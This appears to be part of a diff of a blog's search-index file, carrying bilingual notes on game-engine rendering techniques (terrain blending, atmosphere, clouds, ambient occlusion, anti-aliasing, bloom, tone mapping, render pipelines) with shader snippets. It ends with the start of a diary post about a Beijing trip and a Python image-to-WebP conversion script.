    float3 blend(float4 texturel,float al, float4 texture2, float a2) {
    return texturel.rgb * al + texture2.rgb * a2;
    }

    ​terrain 上的纹理从一个过渡到另一个时,如果简单地使用混合,则平滑但不自然。

    Advanced Texture Splatting

    webp

    1
    2
    3
    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
    return height1 > height2 ? texture1.rgb : texture2.rgb;
    }

    ​根据高度图实现材质的过渡。

    Advanced Texture Splatting - Biased

    webp

    ​引入 Height Bias。

    1
    2
    3
    4
    5
    6
    7
    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
    float depth = 0.2;
    float ma = max(texture1.a + height1, texture2.a + height2) - depth;
    float b1 = max(texture1.a + height1 - ma, 0);
    float b2 = max(texture2.a + height2 - ma, 0);
    return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
    }

    Sampling from Material Texture Array

    ​从材质纹理数组采样

    webp

    Parallax and Displacement Mapping

    ​视差和位移贴图

    webp

    Parallax Mapping: Due to the height of the surface, the eye sees point B instead of pointA. lt creates a sense of dimensionality.

    ​视差映射:由于表面的高度,眼睛看到的是 B 点而不是 A 点。它创造了一种维度感。

    Expensive Material Blending

    webp

    • Many Texturing - Low performance whenmultiple materials are sampled too many times

      许多纹理 - 对多种材质采样太多次时性能较低

    • Huge Splat Map - We only see a small set ofterrain, but we load splat maps for 100square kminto video memory

      巨大的 Splat 地图 - 我们只能看到一小部分地形,但我们将 100 平方公里的 Splat 地图加载到显存中

    Virtual Texture

    ​虚拟纹理(Virtual Texture)是一种用于实时图形渲染的技术,旨在解决在有限的显存中管理大量纹理数据的挑战。传统上,图形渲染中使用的纹理数据通常是预加载到显存中的,但这种方法在需要处理大规模纹理数据时会遇到限制,尤其是在高分辨率的场景中。

    ​虚拟纹理通过将纹理数据分割成较小的块,并根据视野和需求动态地加载和卸载这些块,以优化显存利用率并允许处理大规模纹理数据。虚拟纹理技术的核心思想是将纹理数据存储在较大的物理存储介质(如硬盘或固态硬盘)中,然后根据需要将其部分加载到显存中供渲染使用。

    webp

    • Build a virtual indexed texture to represent allblended terrain materials for whole scene

      构建虚拟索引纹理来表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view-depend LOD

      仅根据视图相关的 LOD 加载图块的材质数据

    • Pre-bake materials blending into tile and store them into physical textures

      预烘烤混合到瓷砖中的材料并将其存储到物理纹理中

    VT implementation, DirectStorage & DMA

    ​VT 实现、DirectStorage 和 DMA

    webp

    Floating-point Precision Error

    ​浮点精度误差

    webp

    ​计算中 float 的精度可能不够,导致很远的物体会出现波动。

    Camera-Relative Rendering

    webp

    • Translates objects by the negated world space camera position before any other geometric transformations affect them

      在任何其他几何变换影响对象之前,通过否定的世界空间相机位置来平移对象

    • It then sets the world space camera position to 0 and modifies all relevant matrices accordingly

      然后将世界空间相机位置设置为 0 并相应地修改所有相关矩阵

    Integration with other world elements (rocks, trees, grass)

    ​与其他世界元素(岩石、树木、草)的融合

    Tree Rendering

    webp

    ​近处树模型复杂,远处简单

    Decorator Rendering

    webp

    ​装饰渲染。近处复杂,远处简单

    Road and Decals Rendering

    ​道路和贴花渲染

    webp

    Terrain Editing in Game Engine、Procedure Terrain creation……

    第六节(下):游戏中地形大气和云的渲染

    Sky and Atmosphere

    How to “Paint” Everything in the Sky

    webp

    ​主要讲渲染天空和云。

    Atmosphere

    Analytic Atmosphere Appearance Modeling

    ​大气外观分析建模

    webp

    $$\begin{aligned}
    \mathbb{F}(\theta,\gamma)=& (1+Ae{\frac{B}{\cos\theta+0.01}})\cdot(C+De{E\gamma}+ \
    &+F\cos2\gamma+G\cdot\chi(H,\gamma)+I\cdot\cos{\frac{1}{2}}\theta)
    \end{aligned}$$

    $$L_{\lambda}=\mathbb{F}(\theta,\gamma)\cdot L_{M\lambda}$$

    用这么个方程就表示了整个大气外观!

    Pros

    • Calculation is simple and efficient

      计算简单高效

    Cons

    • Limited to ground view

      仅限地面视图

    • Atmosphere parameters can’t be changed freely

      气氛参数不能随意更改

    Participating Media

    ​参与媒体

    webp

    Volume filled with particles

    ​充满颗粒的体积

    Interact differently with light depending on its composition

    ​与光的相互作用不同,具体取决于其成分

    How Light Interacts with Participating Media Particles?

    ​光如何与参与的介质粒子相互作用?

    webp

    • Absorption

      吸收

    • Out-scattering

      外散射

    • Emission

      排放

    • In-scattering

      内散射

    Volume Rendering Equation (VRE)

    ​体绘制方程 (VRE)

    webp

    $$L(P,\omega)=\int_{x=0}^{d}T(x)[\sigma_{a}\cdot L_{e}(x,\omega)+\sigma_{s}\cdot L_{i}(x,\omega)]dx+T(M)L(M,\omega)$$

    $$T(x)=e{-\int_xP\sigma_t(s)ds}$$

    Transmittance: the net reduction factor from absorption and out-scattering

    ​透射率:吸收和外散射的净减少因子

    $$L_{i}(x,\omega)=\int_{S{2}}f_{p}(x,\omega,\omega{\prime})L(x,\omega{\prime})d\omega{\prime}$$

    The net increase factor from in-scattering

    ​内散射的净增加因子

    Real Physics in Atmosphere

    webp

    学习计算机图形学还要对气象学有所涉猎!

    Scattering Types

    ​散射类型

    webp

    • Rayleigh Scattering

      瑞利散射

      Scattering of light by particles that have a diameter much smaller than the wavelength of the radiation (eg. air molecules)

      直径远小于辐射波长的粒子(例如空气分子)对光进行散射

    • Mie scattering

      米氏散射

      Scattering of light by particles that have a diameter similar to or larger than the wavelength of the incident light (eg. aerosols)

      直径类似于或大于入射光波长的颗粒(例如气溶胶)对光进行散射

    Rayleigh Scattering

    ​瑞利散射

    webp

    • Certain directions receive more light than others front-back symmetry

      某些方向比其他方向接收更多的光线,前后对称

    • Shorter wavelengths (eg. blue) are scattered more strongly than longer wavelengths (eg.red)

      较短波长(例如蓝色)比较长波长(例如红色)散射更强烈

    webp

    Why Sky is Blue

    webp

    ​由于大气层的存在,折射出蓝色,直射出红色。

    Mie Scattering

    ​米氏散射

    webp

    • Scatter light of all wavelength nearly equally

      几乎均匀地散射所有波长的光

    • Exhibit a strong forward directivity

      表现出强烈的前向方向性

    Mie Scattering Equation

    webp

    Mie Scattering in Daily Life

    ​日常生活中的三重散射

    webp

    • Exhibit a strong forward directivity (halo effects around sun)

      表现出强烈的前向方向性(太阳周围的光晕效应)

    • Scatter light of all wavelength nearly equally (fog effects)

      几乎均匀地散射所有波长的光(雾效应)

    Variant Air Molecules Absorption

    ​不同的空气分子吸收

    webp

    • Ozone (O3)
      Absorb strongly at longer wavelengths to filter out the reds, oranges, yellows

      强烈吸收较长波长,滤除红色、橙色、黄色

    • Methane (CH4)

      Well-known for absorbing red light

      以吸收红光而闻名

    Single Scattering vs. Multi Scattering

    webp

    $$L_1=\int_A^BL_{P->A}ds$$

    webp

    $$L_{n+1}=\int_{A}{B}\int_{4\pi}L_{n}(p,v{\prime})\cdot S(\lambda,\theta,h)\cdot T(p\to A)dv^{\prime}ds$$

    webp

    Ray Marching

    • Ray marching is a popular method to integrate function along a path

      射线行进是一种沿路径集成功能的流行方法

    • We use ray marching to calculate final radiance for a given point by single scattering

      我们使用光线行进通过单次散射计算给定点的最终辐射率

    • The integrated radiance is usually stored in look-up tables (LUT)

      综合辐射率通常存储在**查找表(LUT)**中

    webp

    Precomputed Atmospheric Scattering

    ​预先计算的大气散射

    webp

    webp

    webp

    Challenges of Precomputed Atmospheric Scattering

    ​预计算大气散射的挑战

    • Precomputation Cost

      预计算成本

      • Multi-scattering iterations are very expensive

        多次散射迭代非常昂贵

      • Hard to generate atmosphere LUT on low-end devices (ie. mobile)

        难以在低端设备(即移动设备)上生成氛围 LUT

    • Authoring and Dynamic Adjustment of Environments

      环境的创作和动态调整

      • Artist can’t change scattering coefficients on the fly

        艺术家无法即时更改散射系数

      • Hard to render effects like weather from sunny to rain fog, space travel among planets

        难以渲染天气从晴朗到雨雾、行星间太空旅行等效果

    • Runtime Rendering Cost

      运行时渲染成本

      • Expensive per-pixel multi high dimensional texture sampling for transmittance LUT and multi scattering LUT (always need to down-sample for efficiency)

        昂贵的每像素多高维纹理采样,用于透射 LUT 和多散射 LUT(始终需要下采样以提高效率)

    Production Friendly Quick Sky and Atmosphere Rendering

    ​制作友好的快速天空和大气渲染

    webp

    webp

    $$\begin{aligned}&G_{n+1}=G_{n}*f_{ms}\&\mathbf{F_{ms}}=1+\mathbf{f_{ms}}+\mathbf{f_{ms}{2}}+\mathbf{f_{ms}{3}}+…=\frac{1}{1-\mathbf{f_{ms}}}\&\Psi_{\mathbf{ms}}=\mathbf{L_{2^{nd}order}}\mathbf{F_{ms}}\end{aligned}$$

    Simplify Multi-scattering Assumption

    ​简化多重散射假设

    • Scattering events with order greater or equal to 2 are executed using an isotropic phase function

      使用各向同性相位函数执行阶数大于或等于 2 的散射事件

    • All points within the neighborhood of the position wecurrently shade receive the same amount of second order scattered light

      当前阴影位置附近的所有点接收相同量的二阶散射光

    • Visibility is ignored

      忽略可见性

    webp

    Fixed view position and sun position to remove 2 dimensions out of LUT

    ​固定视图位置和太阳位置以从 LUT 中删除 2 个维度

    webp

    • Generated a 3D LUT to evaluate aerial-perspective effects by ray marching

      生成 3D LUT 以通过光线行进评估空气透视效果

    Good Balance of Performance and Effect

    ​性能与效果的良好平衡

    webp

    “Paint” Cloud

    Cloud Type

    webp

    ​云被分成了这么多种。

    Mesh-Based Cloud Modeling

    ​基于网格的云建模

    webp

    Pros

    • High quality

      高质量

    Cons

    • Overall expensive

      代价高

    • Do not support dynamic weather

      不支持动态天气

    Billboard Cloud

    webp

    ​早期游戏使用贴图描述云。

    Pros

    • Efficient

      高效的

    Cons

    • Limited visual effect

      视觉效果有限

    • Limited cloud type

      有限的云类型

    Volumetric Cloud Modeling

    ​体积云建模

    webp

    Pros

    • Realistic cloud shapes

      逼真的云形状

    • Large scale clouds possible

      可能出现大规模云

    • Dynamic weather supported

      支持动态天气

    • Dynamic volumetric lighting and shadowing

      动态体积照明和阴影

    Cons

    • Efficiency must be considered

      必须考虑效率

    Weather Texture

    webp

    Noise Functions

    webp

    Cloud Density Model

    webp

    Rednering Cloud by Ray Marching

    webp

    第七节:游戏中渲染管线、后处理和其他的一切

    Ambient Occlusion

    ​环境光遮蔽

    webp

    ​环境光遮蔽(Ambient Occlusion)是一种计算机图形学中的技术,用于模拟光线在环境中传播时,由于物体之间的遮挡而导致的阴影效果。它可以增强场景的真实感和细节,使得物体之间的联系更加紧密。

    ​简单来说,环境光遮蔽就是在渲染场景时,考虑物体表面在环境光照射下的遮挡情况,对每个像素点进行采样,并计算出该像素点受到的周围物体的影响程度,最终得到一张带有阴影效果的图像。

    • Approximation of attenuation of ambient light due to occlusion

      由于遮挡而导致的环境光衰减的近似值

    webp

    Precomputed AO

    Using ray tracing to compute the AO offline and store the result into texture, which is widely used in object modeling process

    ​利用光线追踪离线计算 AO 并将结果存储到纹理中,广泛应用于物体建模过程。(空间换时间)

    • Extra storage cost

      额外的存储费用

    • Only apply to static object

      仅适用于静态对象

    webp

    Screen Space Ambient Occlusion (SSAO)

    ​屏幕空间环境光遮挡(SSAO)

    webp

    webp

    • Generate $N$ random samples in a sphere around eachpixel $p$ in view space

      在视图空间中每个像素 $p$ 周围的球体中生成 $N$ 个随机样本

    • Test sample occlusions by comparing depth against depth buffer

      通过将深度与深度缓冲区进行比较来测试样本遮挡

    • Average visibility of sample points to approximate AO

      采样点的平均可见度以近似 AO

    SSAO+

    webp

    • Recall the AO equation is acutally done on the normal-oriented hemisphere

      回想一下 AO 方程实际上是在法向半球上完成的

    ​于是对 SSAO 进行改进,只在半球上采样。

    webp

    ​效果看上去更好了,但是还有些问题,比如水泥墩子后面有不合理的阴影。

    HBAO-Horizon-based Ambient Occlusion

    ​HBAO-基于水平线的环境光遮挡

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Rays that below the horizon angle are occluded

      低于水平角的光线被遮挡

    HBAO lmplementation

    ​HBAO 实施

    webp

    • Use the depth buffer as a heightfield on 2D surface

      使用深度缓冲区作为 2D 表面上的高度场

    • Trace rays directly in 2D and approximate AO from horizon angle

      直接在 2D 中追踪光线并从水平角近似 AO

    GTAO - Ground Truth-based Ambient Occlusion

    ​GTAO - 基于地面实况的环境光遮挡

    webp

    GTAO introduces the missing cosine factor, removes the attenuation function, and add a fast approximation of multi bounce

    ​GTAO 引入了缺失的余弦因子,去除了衰减函数,并添加了多次反射的快速近似

    Add multiple bounces by fitting a cubic polynomial per albedo

    ​通过拟合每个反照率的三次多项式来添加多次反射

    webp

    Ray-Tracing Ambient Occlusion

    ​光线追踪环境光遮挡

    webp

    • Casting rays from each screen pixel using RTT hardware

      使用 RTT 硬件从每个屏幕像素投射光线

      • 1spp(sample per-pixel) works well for far-field occlusion

        1spp(每像素样本)非常适合远场遮挡

      • With 2-4spp, can recover detailed occlusion in contact region

        使用 2-4spp,可以恢复接触区域的详细遮挡

    Fog Everything

    Depth Fog

    Linear fog: 线性雾

    • factor = (end-z)/(end-start)

    Exp fog: 指数雾

    • factor = exp(- density * z)

    Exp squared fog: 指数平方雾

    • factor = exp(-(density * z) ^ 2)

    webp

    Height Fog

    ​Height Fog(高度雾)是一种计算机图形学中的特效,可以模拟出真实世界中的大气层的效果。它通常被应用于游戏、电影等场景中,用于增强场景的逼真度和氛围感。

    ​在 Height Fog 中,雾的浓度与高度成正比。也就是说,离地面越远的区域,雾的浓度越大,从而形成了逐渐模糊、逐渐淡化的效果。同时,Height Fog 还可以调整雾的颜色、密度、高度等参数,以达到不同的视觉效果。

    ​Height Fog 主要用于模拟自然环境中的大气层效果,例如山区、森林、海洋等场景。通过 Height Fog 的渲染,可以使得场景更加真实、自然,并且能够增强场景的情感和氛围感。

    webp

    • Height Fog integration along view diretion

      沿视图方向的高度雾集成

      $\mathrm{D(h)=D_{max}\cdot e^{-\sigma\cdot max(h-H_s,0)}}$

      FogDensitylntegration

      雾密度积分

      $=D_{max}\cdot d\int_{0}{1}e{-\sigma\cdot max((v_{z}+t*d_{z}-H_{s},0)}dt \=D_{max}\cdot d\cdot e^{-\sigma\cdot max(v_{z}-Hs,0)\frac{1-e^{-\sigma\cdot d_{z}}}{\sigma\cdot d_{z}}}$

    • Fog color after transmission

      传输后的雾色

      $\text{Foglnscatter}=1-\exp^{-\text{FogDensitylntegration}}\\text{FinalColor}=\text{FogColor}\cdot\text{Foglnscatter}$

    Voxel-based Volumetric Fog

    ​Voxel-based Volumetric Fog(基于体素的体积雾)是一种计算机图形学中的高级渲染技术。它通过将场景划分成小立方体(体素),并对每个体素进行采样和计算,从而模拟出真实世界中的体积雾效果。

    webp

    Anti-aliasing

    ​反走样

    Reason of Aliasing

    webp

    • Aliasing is a series of rendering artifact which is caused by high-frequency signal vs. insufficient sampling of limited rendering resolutions

      走样是由高频信号与有限渲染分辨率的采样不足引起的一系列渲染伪影

    Anti-aliasing

    webp

    The general strategy of screen-based antialiasing schemes is using a sampling pattern to get more samples and then weight and sum samples to produce a pixel color

    ​基于屏幕的抗锯齿方案的一般策略是使用采样模式获取更多样本,然后对样本进行加权和求和以生成像素颜色

    Super-sample AA (SSAA) and Multi-sample AA (MSAA)

    ​超样本 AA (SSAA) 和多样本 AA (MSAA)

    • Super sampling is the most straightforward solution to solve AA

      超采样是解决AA最直接的解决方案

    webp

    SSAA.4x rendering resolution

    ​SSAA.4x 渲染分辨率

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and pixel shading

    ​4x 光栅化和像素着色

    webp

    MSAA, only multi-sampling necessary pixels

    ​MSAA,仅多重采样必要的像素

    4x z-buffer and framebuffer

    ​4x z-缓冲区和帧缓冲区

    4x rasterization and 1+ x pixel shading

    ​4x 光栅化和 1+x 像素着色

    FXAA (Fast Approximate Anti-aliasing)

    ​FXAA(快速近似抗锯齿)

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    M: Luminance of middle pixel
    (L = 0.299 * R + 0.587 * G + 0.114 * B)

    #define MinThreshold 0.05

    float MaxLuma = max(N, E,W, S, M);
    float MinLuma = min(N, E, W, S, M);
    float Contrast = MaxLuma - MinLuma;
    if(Contrast >= MinThreshold)
    ...

    Anti-aliasing based on 1x rendered image

    ​基于 1x 渲染图像的抗锯齿

    • Find edge pixels by luminance

      通过亮度查找边缘像素

    • Compute offset for every edge pixel

      计算每个边缘像素的偏移量

    • Re-sample edge pixel by its offset to blend with a neighbor

      通过偏移量重新采样边缘像素以与邻居混合

    Compute Offset Direction

    ​计算偏移方向

    webp

    Edge Searching Algorithm

    ​边缘搜索算法

    webp

    • Find aliasing edge that the pixel is in

      查找像素所在的锯齿边缘

      • Record constrast luminance and average luminance of current pixel and offset pixel

        记录当前像素和偏移像素的对比度亮度和平均亮度

        $L_{avg}\quad L_{contrast}$

      • Search along the 2 perpendicular direction and calculate the average luminance

        沿 2 垂直方向搜索并计算平均亮度

        $L_{edgein}\quad L_{edge2n}$

      • Until $\text{abs}( L_{edge1n} -L_{current})>0.25L_{contrast}\\text{abs}(L_{edge2n} -L_{current})>0.25L_{contrast}$

    Calculate Blend Coefficient

    ​计算混合系数

    webp

    • Compute blender coefficient

    targetP is the nearer edge end of CurrentP

    ​targetP 是 CurrentP 较近的边缘端

    if($(L_{avg}-L_{current}) * (L_{avg} -L_{targetp})> 0$)

    ​magnitude = 0;

    else
    magnitude = abs(0.5 - dst / edgeLength);

    Blend Nearby Pixels

    ​混合附近的像素

    • Compute blender coefficient

    webp

    PixelNewColor =Texture(CurrentP_UV+ offset_direction * offset_magnitude)

    FXAA Result

    webp

    TAA (Temporal Anti-aliasing)

    ​TAA(临时抗锯齿)

    webp

    Utilize spatial-temporal filtering methods to improve AA stability in motion

    ​利用空间-时间过滤方法来提高 AA 稳定性运动

    webp

    Post-process

    But, the real magic in Post-process…

    ​图像后处理,数字图像处理领域。

    webp

    Post-process in 3D Graphics refers to any algorithm that will be applied to the final image. lt can be done for stylistic reasons (color correction, contrast, etc.) or for realistic reasons (tone mapping, depth of field, etc.)

    ​3D 图形中的后处理是指应用于最终图像的任何算法。可以出于风格原因(色彩校正、对比度等)或现实原因(色调映射、景深等)来完成此操作。

    Bloom Effect

    What is Bloom

    webp

    • The physical basis of bloom is that, in the real world, lenses can never focus perfectly

      光晕的物理基础是,在现实世界中,镜头永远无法完美对焦

    • Even a perfect lens will convolve theincoming image with an Airy disk

      即使是完美的镜头也会将传入的图像与艾里斑进行卷积

    Detect Bright Area by Threshold

    ​使用阈值法检测发光区域

    webp

    Find Luminance (Y) apply the standard coefficients for sRGB:

    ​查找亮度 (Y),应用 sRGB 的标准系数:

    $$Y=R_{lin}*0.2126+G_{lin}*0.7152+B_{lin}*0.0722$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    float threshold;
    float4 computeHighlightArea()
    {
    [...] // first do normal lighting calculations and output results
    float4scene_color = float4(lighting, 1.0f);
    // check whether fragment output is higher than threshold, if so output as highlight color
    float luminance = dot(scene_color.rgb, vec3(0.2126f, 0.7152f, 0.0722f));

    float4highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
    if(luminance > threshold)
    highlight color = float4(scene_color.rgb, 1.0f);
    return highlight_color;
    }

    Gaussian Blur

    webp

    ​使用二维正态分布的卷积核进行卷积作高斯模糊。

    Pyramid Guassian Blur

    ​金字塔高斯模糊

    webp

    We can’t do all that filtering at high resolution, so we need a way to downsample and upsample the image

    ​我们无法以高分辨率进行所有过滤,因此我们需要一种对图像进行下采样上采样的方法

    Need a weight coefficient to tweak final effect

    ​需要一个权重系数来调整最终效果

    Bloom Composite

    ​混合形成 Bloom 效果。

    webp

    webp

    Tone Mapping

    ​色调映射

    webp

    • No way to directly display HDR image in a SDR device

      无法在 SDR 设备中直接显示 HDR 图像

    • The purpose of the Tone Mapping function is to map the wide range of high dynamic range (HDR) colors into standard dynamic range (SDR) that a display can output

      色调映射功能的目的是将各种高动态范围 (HDR) 颜色映射到显示器可以输出的标准动态范围 (SDR)

    Tone Mapping Curve

    ​色调映射曲线

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    float3 F(float3 x)
    {
    const float A = 0.22f;
    const float B = 0.30f;
    const float C = 0.10f;
    const float D = 0.20f;
    const float E = 0.01f;
    const float F = 0.30f;
    return((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
    }

    float3 Uncharted2ToneMapping(float3 color, float adapted lum)
    {
    const float WHITE = 11.2f;
    return F(1.6f * adapted_lum * color) / F(WHITE);
    }
    • Get a filmic look without making renders dirty

      获得电影般的外观而不会使渲染变脏

    • Give images proper contrast andnicely roll off any pixels over 1

      为图像提供适当的对比度,并很好地滚掉超过 1 的任何像素

    ACES

    webp

    ​Academy Color Encoding System(ACES)是一种由美国电影艺术与科学学会(Academy of Motion Picture Arts and Sciences)开发的颜色管理系统。它旨在提供一种标准化的数字图像工作流程,以便在不同的硬件和软件平台上保持一致的颜色表现和图像质量。

    ​ACES 的主要目标是解决数字媒体制作中的颜色管理问题,确保从拍摄到后期制作再到最终呈现的整个过程中,颜色能够被准确和一致地处理。ACES 采用高动态范围(HDR)和广色域的工作方式,可以捕捉和表现更丰富的颜色和亮度细节。

    • Academy Color Encoding System

      学院颜色编码系统

      • Primarily for Film & Animation

        主要用于电影和动画

      • Interesting paradigms and transformations

        有趣的范例和转变

    • The useful bits

      有用的部分

      • Applying Color Grading in HDR is good

        在 HDR 中应用颜色分级效果很好

      • The idea of a fixed pipeline up to the final OTD transforms stage is good

        直到最终 OTD 转换阶段的固定管道的想法很好

        • Separates artistic intent from the mechanics ofsupporting different devices

          将艺术意图与支持不同设备的机制分开

    HDR and SDR Pipeline

    ​HDR 和 SDR 管道

    webp

    • Visual consistency between HDR / SDR

      HDR / SDR 之间的视觉一致性

    • Similar SDR results to previous SDR color pipeline

      与之前的 SDR 颜色管道类似的 SDR 结果

    • High quality

      高质量

    • High performance

      高性能

    • Minimal disruption to art teams

      对艺术团队的干扰最小化

      • Simple transition from current color pipeline

        从当前颜色管道简单过渡

      • Minimal additional overhead for mastering HDR and SDR

        掌握 HDR 和 SDR 的额外开销最小

    Tone Mapping Curve Comparison

    ​色调映射曲线比较

    webp

    Color Grading

    ​颜色分级

    webp

    Lookup Table (LUT)

    ​查找表 (LUT)

    webp

    • LUT is used to remap the input color values of source pixels to new output values based on data contained within the LUT

      LUT 用于根据 LUT 中包含的数据将源像素的输入颜色值重新映射到新的输出值

    • A LUT can be considered as a kind of color preset that can be applied to image or footage

      LUT 可以被视为一种可应用于图像或素材的颜色预设

    LUT 3D or 2D

    webp

    Artist Friendly Tools

    ​PS 之类的软件都可以创建 LUT。

    webp

    webp

    Color grading is the most cost-effective feature of game rendering

    ​颜色分级是游戏渲染中最具成本效益的功能

    Rendering Pipeline

    ​回顾一下渲染管线。

    One Equation for Everything

    webp

    What We Learned about Rendering (1/4)

    webp

    What We Learned about Rendering (2/4)

    webp

    What We Learned about Rendering (3/4)

    webp

    What We Learned about Rendering (4/4)

    webp

    Redering Pipeline

    webp

    • Rendering pipeline is the management order of all rendering operation execution and resource allocation

      渲染管线是所有渲染操作执行和资源分配的管理顺序

    Forward Rendering

    1
    2
    3
    for n meshes
    for m lights
    color += shading(mesh, light)

    ​按顺序渲染。

    webp

    Sort and Render Transparent after Opaque Objects

    webp

    ​渲染透明物体在不透明物体之后进行。

    Rednering with Many Lights

    ​渲染多个光。

    Deferred Rendering

    延迟渲染

    webp

    webp

    Pros

    • Lighting is only computed for visible fragments

      仅针对可见片段计算光照

    • The data from the G-Buffer can be used for post-processing

      G-Buffer 中的数据可用于后处理

    Cons

    • High memory and bandwidth cost

      高内存和带宽成本

    • Not supporting transparent object

      不支持透明物体

    • Not friendly to MSAA

      对 MSAA 不友好

    Tile-based Rendering

    ​Tile-based Rendering(基于块的渲染)是一种在计算机图形学中常用的渲染技术。它通过将图像划分为小块(瓦片),并对每个瓦片进行独立的渲染,从而提高渲染效率和性能。

    ​在传统的全局渲染方法中,整个场景的几何体和纹理都需要被完整地装入显存中,并在每个像素上进行计算。这会导致内存和计算资源的浪费,尤其在处理复杂的场景时更加明显。而 Tile-based Rendering 则针对这个问题进行了优化。

    ​Tile-based Rendering 首先将场景划分为小块,每个块可以是一个像素或者更大的区域。然后,它只对可见的块进行处理,即只渲染那些对最终图像有贡献的部分。这样一来,渲染引擎可以专注于处理可见区域,减少了不必要的计算和内存访问操作。

    webp

    Light Culling by Tiles

    webp

    Depth Range Optimization

    ​深度范围优化

    webp

    • Get Min/Max depth per tile from Pre-z pass

      从 Pre-z pass 获取每个图块的最小/最大深度

    • Test depth bounds for each light

      测试每个灯的深度范围

    Tile-based Deferred Rendering

    webp

    Forward+ (Tile-based Forward) Rendering

    ​Forward+(基于图块的前向)渲染

    webp

    • Depth prepass (prevent overdraw / provide tile depth bounds)

      深度预通道(防止过度绘制/提供图块深度边界)

    • Tiled light culling (output: light list per tile)

      平铺灯光剔除(输出:每个平铺的灯光列表)

    • Shading per object (PS: lterate through light list calculated in light culling)

      每个对象的着色(PS:遍历在光剔除中计算的光列表)

    Cluster-based Rendering

    ​Cluster-based Rendering(基于集群的渲染)是一种用于分布式渲染的技术。它利用多个计算节点(也称为集群)的并行计算能力来加速图形渲染过程。

    ​在传统的单机渲染中,所有的渲染任务都由单个计算节点完成。这限制了渲染速度和处理复杂场景的能力。而 Cluster-based Rendering 则通过将渲染任务分发到多个计算节点上并行处理,提高了渲染效率和性能。

    ​在 Cluster-based Rendering 中,场景被划分为多个子区域,每个子区域由一个计算节点负责渲染。这些节点之间通过网络进行通信和协调,共同完成整个渲染任务。每个节点独立地渲染自己负责的子区域,并将结果传输回主节点进行合成,最终生成完整的图像。

    webp

    Visibility Buffer

    webp

    Real Rendering Pipeline

    webp

    Challenges

    webp

    • Complex parallel work needs to synchronize with complex resource dependency

      复杂的并行工作需要与复杂的资源依赖同步

    • Large amount of transient resource whose lifetime is shorter than one frame

      大量瞬态资源,其生命周期短于一帧

    • Complex resource state management

      复杂的资源状态管理

    • Exploit newly exposed GPU features without extensive user low level knowledge

      无需广泛的用户低级知识即可利用新公开的 GPU 功能

    Frame Graph

    webp

    A Directed Acyclic Graph (DAG) of pass and resource dependency in a frame, not a real visual graph

    ​帧中通道和资源依赖关系的有向无环图 (DAG),而不是真正的可视化图

    Render to Monitor

    ​渲染到显示器

    Screen Tearing

    ​Screen Tearing(屏幕撕裂)是一种在计算机和视频游戏中常见的图像问题。它通常出现在快速移动或相机旋转等情况下,导致图像出现水平分割线或不协调的图案,影响观看体验。

    ​Screen Tearing 的出现是由于显示器和 GPU 之间的同步问题。当 GPU 在渲染新帧时,如果显示器正在显示先前的帧,就会发生 Screen Tearing。这是因为显示器和 GPU 的帧速率不同步,导致部分新帧和部分旧帧同时显示在屏幕上,从而产生撕裂的效果。

    ​解决 Screen Tearing 的方法包括垂直同步(V-sync)和自适应同步(Adaptive-Sync)。垂直同步是一种通过锁定 GPU 的输出速度来匹配显示器的刷新速率的技术。它可以防止屏幕撕裂,但可能会导致输入延迟和帧率下降。自适应同步则是一种更高效的技术,它可以根据 GPU 的输出动态地调整显示器的刷新速率,以匹配 GPU 的速度,从而消除屏幕撕裂并保持更平滑的画面。

    webp

    In most games your GPU frame rate will be highly volatile

    ​在大多数游戏中,您的 GPU 帧速率会非常不稳定

    When new GPU frame updates in the middle of last screen frame, screen tearing occurrs

    ​当新的 GPU 帧在最后一个屏幕帧的中间更新时,屏幕撕裂发生

    V-Sync Technology

    webp

    Synchronizing buffer swaps with the Vertical refresh is called V-sync

    ​将缓冲区交换与垂直刷新同步称为 V-sync

    V-Sync can be used to prevent tearing but framerates are reduced, the mouse is lagging & stutteringruins gameplay

    ​垂直同步可用于防止撕裂,但帧速率会降低,鼠标会出现滞后和卡顿,从而破坏游戏玩法

    Variable Refresh Rate

    ​可变刷新率(Variable Refresh Rate,VRR)是一种显示技术,用于动态调整显示器的刷新率,以匹配输入信号的帧率。传统的显示器通常以固定的刷新率(例如 60Hz 或 120Hz)工作,但 VRR 技术允许显示器根据实际的帧率来动态调整刷新率。

    ​VRR 技术最常见的实现是 AMD 的 FreeSync 和 NVIDIA 的 G-Sync。当显示器采用 VRR 技术时,它可以与图形处理单元(GPU)通信,以了解当前帧率,并相应地调整自己的刷新率。这意味着在低帧率情况下,显示器可以减少刷新率,而在高帧率情况下,可以增加刷新率,从而实现更流畅的画面表现。

    webp

    ]]>
    @@ -1975,7 +1975,7 @@ /posts/Diary-%E8%80%81%E5%84%BF%E5%8C%97%E5%84%BF%E4%BA%AC%E5%84%BF/ - 这是前言军博会!
    凡哥😍go to peking 吗
    去看这个
    走!

    ​凡哥从未去过北京,他一直嚷嚷着有机会可以一去。刚好在小红书上看到了军博会的消息,于是就怂恿凡哥周末 5.19 勇闯北京!


    ​宿舍 3 人购买车票:

    • G6712 ¥48

      • 07:12 保定东
      • 07:38 高碑店东
      • 07:49 涿州东
      • 08:14 北京丰台
    • G6731 ¥57

      • 20:57 北京西
      • 21:39 保定东

    import os  # 处理文件和目录
    import sys # 获取命令行参数
    from PIL import Image # 处理图片

    def convert_to_webp(input_file, output_file, quality=80):
    # 函数用于转换一个图片文件
    # input_file: 输入的图片文件路径
    # output_file: 输出的 webp 文件路径
    # quality: webp 文件质量,取值范围 1-100,默认值 80
    try:
    # 打开输入图片文件
    with Image.open(input_file) as im:
    # 保存为 webp 格式
    im.save(output_file, "webp", quality=quality)
    print(f"Converted: {input_file} => {output_file}")
    except Exception as e:
    # 捕获异常
    print(f"Error converting file: {input_file}")
    print(str(e))

    def process_folder(folder_path):
    # 函数用于处理整个文件夹
    # folder_path: 文件夹路径
    for root, dirs, files in os.walk(folder_path):
    for filename in files:
